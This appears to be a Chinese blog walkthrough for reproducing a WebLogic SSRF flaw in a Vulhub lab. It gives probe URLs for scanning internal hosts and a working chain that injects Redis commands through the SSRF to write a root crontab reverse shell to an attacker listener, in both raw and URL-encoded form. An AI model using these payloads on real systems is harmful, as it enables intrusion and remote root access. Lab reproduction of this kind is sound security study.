漏洞复现环境搭建请参考

Vulhub漏洞复现环境搭建流程_vulhub一键搭建漏洞测试靶场,来进行漏洞复现-CSDN博客

docker未能成功启动redis请参考

http://t.csdnimg.cn/5osP3

漏洞版本

weblogic 10.0.2 -- 10.3.6.0

漏洞验证

（1）访问7001端口，weblogic的经典报错页面

（2）SSRF漏洞存在于uddiexplorer/SearchPublicRegistries.jsp

#weblogic ssrf 漏洞出现在uudi组件uddiexplorer.war下的SearchPublicRegistries.jsp
#直接访问
http://192.168.88.128:7001/uddiexplorer/SearchPublicRegistries.jsp

（3）利用以下payload对漏洞验证

#提交参数值为url:port，根据返回错误不同，可对内网状态进行探测
#http://xxxx:xxxx/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxxx:xx
http://192.168.88.128:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.88.128:80

漏洞利用

（1）获取内网中redis ip

（2）测试redis端口是否开放

http://192.168.88.128:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379

（3）攻击机开启监听

（4）利用redis计划任务进行反弹shell

set 1 "\n\n\n\n* * * * * root bash -c 'sh -i >& /dev/tcp/192.168.88.128:8888 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

#url编码过后(修改IP和端口号即可)
http://192.168.88.128:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.88.128%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

（5）成功反弹shell